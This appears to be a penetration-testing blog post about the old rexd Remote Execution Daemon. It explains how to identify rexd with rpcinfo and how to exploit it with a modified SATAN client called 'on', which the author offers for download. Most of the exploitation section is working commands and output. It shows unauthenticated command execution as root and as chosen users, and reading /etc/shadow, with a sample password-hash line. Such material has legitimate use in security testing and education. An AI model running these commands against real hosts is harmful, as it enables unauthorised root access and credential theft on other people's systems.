Rexd Client For Linux

I recently encountered the rexd service running on a host I was testing.  This is a really old-school UNIX service which you don’t see much on modern networks (in my experience at least).  It’s well know that it’s insecure: It basically lets you run any command on the host as any user you like with no authentication.

This post briefly covers how to identify the service and how to exploit it.  I’ve also modified the rexd client from SATAN to compile cleanly on Linux (download link below…).

 

Identifying Hosts Running Rexd

Use rpcinfo to check the RPC service running on the target host (assuming the portmapper is running – 111/TCP).  If rexd is listed, you’re in luck:

$ rpcinfo -p 10.0.0.1
   program vers proto   port                               
    100000    4   tcp    111  rpcbind                      
    100000    3   tcp    111  rpcbind                      
    100000    2   tcp    111  rpcbind                      
    100000    4   udp    111  rpcbind                      
    100000    3   udp    111  rpcbind                      
    100000    2   udp    111  rpcbind                      
    100229    1   tcp  32795  metad                        
    100229    2   tcp  32795  metad                        
    100230    1   tcp  32796  metamhd                      
    100242    1   tcp  32797  rpc.metamedd                 
    100017    1   tcp  32798  rexd                   <---   :-)
...

Exploitation

Exploitation is a simple as finding a client and running it.  Solaris hosts usually have the client “on” installed by default.  If you’ve got a Solaris VM, or you’ve already broken into another Solaris machine during your pentest, you can probably use that.

Alternatively, if you’d prefer a Linux client, it seems you’re out of luck.  Modern distros don’t seem to have such a client (I checked Gentoo and Debian).  SATAN (an old-school pentesting toolkit) has one which I modified to compile cleanly and be a bit easier to use.  Download my modified rexd client here.

Update: 2011-11 Thanks to Hank Leininger for the patch. Now supports -p arg.

To compile / install:

$ tar xfz on.tar.gz
$ cd on
$ make
$ sudo make install

Help message:

$ on
Usage: on [ -u uid ] [ -g gid ] [ -h hostname ] ip command...
Examples:
    on 10.0.0.1 cat /etc/shadow
    on 10.0.0.1 -u 1 10.0.0.1 id

on is a client for rexd, the Remote Execution Daemon.  To check if a target
is running rexd, do 'rpcinfo -p ip' and check for rexd (program number 100017).

If rexd is running on the target you should be able to execute commands on the
remote host as any user you like.

This program is a minor modification of 'rex' by Wietse Venema, part of SATAN:

http://www.porcupine.org/satan/mirrors.html

To run:

$ on 10.0.0.1 id
uid=0(root) gid=0(root)
$ on -u 1 -g 2 10.0.0.1 id
uid=1(daemon) gid=2(bin)
$ on 10.0.0.1 cat /etc/shadow
root:.VLpoFoQoa8eY:14175::::::
daemon:NP:6445::::::
bin:NP:6445::::::
...

 

Tags: , ,

Posted in Blog